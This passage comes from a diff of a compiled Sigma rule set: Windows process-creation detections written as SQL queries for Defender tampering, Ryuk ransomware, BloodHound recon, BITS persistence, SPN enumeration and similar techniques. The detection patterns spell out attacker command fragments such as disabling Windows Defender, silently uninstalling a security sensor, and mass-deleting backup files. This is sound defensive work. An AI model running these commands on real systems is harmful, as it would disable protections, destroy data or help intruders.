'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" - ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" - }, - { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "title": "Potential SPN Enumeration Via Setspn.EXE", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", + "author": "Markus Neis, keepwatch", "tags": [ - 
"attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_setspn_spn_enumeration.yml" }, { - "title": "Process Memory Dump Via Dotnet-Dump", - "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "title": "Potential Discovery Activity Via Dnscmd.EXE", + "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "status": "experimental", - "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. 
DNS zones used to host the DNS records for a particular domain.", + "author": "@gott_cyber", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.execution", + "attack.t1543.003" ], "falsepositives": [ - "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" + "Legitimate administration use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet_dump.yml" + "filename": "proc_creation_win_dnscmd_discovery.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036.002" ], "falsepositives": [ - 
"Legitimate administration" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR 
CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Suspicious Csi.exe Usage", + "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. 
Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ + "attack.execution", + "attack.t1072", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Legitimate usage by software developers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_csi_execution.yml" }, { - "title": "Remote Access Tool - ScreenConnect Execution", - "id": "57bff678-25d1-4d6c-8211-8ca106d12053", - "status": "test", - "description": "An adversary may use 
legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate usage of the tool" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' 
ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564.001" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. 
However this action must be always investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - 
"attack.t1218.011", + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Monitoring For Persistence Via BITS", - "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "title": "Suspicious File Characteristics Due to Missing Fields", + "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "status": "test", - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. 
It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "author": "Sreeman", + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.defense_evasion", - "attack.t1197" + "attack.execution", + "attack.t1059.006" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' 
ESCAPE '\\')) AND NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" + "filename": "proc_creation_win_susp_file_characteristics.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "Remote Code Execute via Winrm.vbs", + "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" + "filename": 
"proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" }, { - "title": "Application Whitelisting Bypass via Dnx.exe", - "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", - "status": "test", - "description": "Execute C# code located in the consoleapp folder", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Msbuild Execution By Uncommon Parent Process", + "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "status": "experimental", + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of dnx.exe by legitimate user" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nuget.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dnx.yml" + "filename": "proc_creation_win_msbuild_susp_parent_process.yml" }, { - "title": "Suspicious Extrac32 Execution", - "id": "aa8e035d-7be4-48d3-a944-102aec04400d", - "status": "experimental", - "description": "Download or Copy file with Extrac32", + "title": "Suspicious Execution of Shutdown", + "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "status": "test", + "description": "Use of the commandline to shutdown or reboot windows", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" 
+ "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_extrac32.yml" + "filename": "proc_creation_win_shutdown_execution.yml" }, { - "title": "Remote Access Tool - NetSupport Execution", - "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", + "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.t1087.001" ], "falsepositives": [ - "Legitimate use" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport.yml" + "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" }, { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance 